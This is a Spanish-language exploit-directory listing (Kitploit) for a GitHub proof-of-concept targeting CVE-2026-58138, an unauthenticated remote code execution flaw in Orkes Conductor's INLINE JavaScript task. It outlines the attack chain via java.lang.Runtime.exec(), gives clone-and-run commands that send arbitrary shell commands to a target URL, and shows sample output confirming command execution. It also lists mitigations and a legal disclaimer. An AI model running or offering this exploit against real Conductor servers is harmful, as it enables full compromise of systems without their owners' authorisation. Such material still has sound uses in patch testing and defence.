Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-58138 — CVE-2026-58138 - Conductor (3.21.21..<3.30.2) RCE sin autenticación mediante el evaluador INLINE de GraalVM | Kitploit
Herramientas/GitHubGitHub/0xgh057r3c0n/cve-2026-58138
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHub0xgh057r3c0n/cve-2026-58138

CVE-2026-58138

CVE-2026-58138 - Conductor (3.21.21..<3.30.2) RCE sin autenticación mediante el evaluador INLINE de GraalVM

Ver Repositorio
hace 29 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-58138 — Conductor (3.21.21..<3.30.2) Ejecución Remota de Código no Autenticada

Orkes Conductor

Vulnerabilidad crítica de ejecución remota de código en Orkes Conductor

CVE Exploit Python


📋 Resumen

CVE-2026-58138 es una vulnerabilidad crítica de ejecución remota de código (RCE) no autenticada que afecta a Orkes Conductor en las versiones 3.21.21 hasta 3.30.1. Esta vulnerabilidad permite a los atacantes ejecutar comandos arbitrarios en el servidor de Conductor sin requerir autenticación alguna, lo que puede provocar un compromiso total del sistema.

🔴 Severidad

  • Puntuación CVSS: 9.8 (Crítica)
  • Vector de ataque: Red
  • Autenticación: No requerida
  • Impacto: Compromiso total del sistema

⚙️ Detalles de la Vulnerabilidad

La vulnerabilidad existe en el tipo de tarea INLINE dentro del motor de flujos de trabajo de Orkes Conductor. La tarea INLINE admite la evaluación de JavaScript con acceso a objetos Java mediante eval, lo que permite a un atacante:

  1. Registrar un flujo de trabajo malicioso que contenga una tarea INLINE con código JavaScript
  2. Ejecutar código Java arbitrario a través de la interoperabilidad Java de JavaScript
  3. Ejecutar comandos del sistema en el servidor de Conductor mediante java.lang.Runtime.exec()

📦 Versiones Afectadas

Rango de VersionesEstado
3.21.21 - 3.30.1✅ Vulnerable
> 3.30.1❌ Parcheada

🚀 Instalación

root@kitploit:~
# Clone the repository
git clone https://github.com/0xgh057r3c0n/CVE-2026-58138.git
cd CVE-2026-58138

# Make the script executable
chmod +x CVE-2026-58138.py

# Verify installation
python3 CVE-2026-58138.py --help

💻 Uso

root@kitploit:~
# Basic usage
python3 CVE-2026-58138.py http://target:8080

# Custom command
python3 CVE-2026-58138.py http://target:8080 -c "whoami; id"

📊 Ejemplo de Salida

root@kitploit:~
[>] Orkes Conductor 3.21.21 - 3.30.1 Remote Code Execution
[>] Author: 0xgh057r3c0n
[>] CVE-2026-58138 Unauthenticated RCE PoC

[*] target  = http://192.168.1.100:8080
[*] command = 'id; hostname'
[+] workflow 'pwn_1742345678' registered (HTTP 200)
[+] started workflow id = 123e4567-e89b-12d3-a456-426614174000
[+] UNAUTHENTICATED RCE CONFIRMED – command output:
uid=1000(conductor) gid=1000(conductor) groups=1000(conductor)
conductor-server-6b7c8d9e0f-abc12

🛡️ Mitigación

  1. Actualice a Orkes Conductor 3.30.2 o posterior
  2. Deshabilite el tipo de tarea INLINE si no es necesario
  3. Restrinja el acceso de red a la API de Conductor

⚠️ Aviso Legal

Solo con fines educativos y de investigación en seguridad. Úselo únicamente en sistemas de su propiedad o para los que tenga permiso explícito de prueba.


📚 Referencias

  • NVD - CVE-2026-58138
  • Seguridad de Orkes Conductor

⭐ ¿Te resultó útil? ¡Dale una estrella en GitHub! ⭐

GitHub stars

Descargar herramienta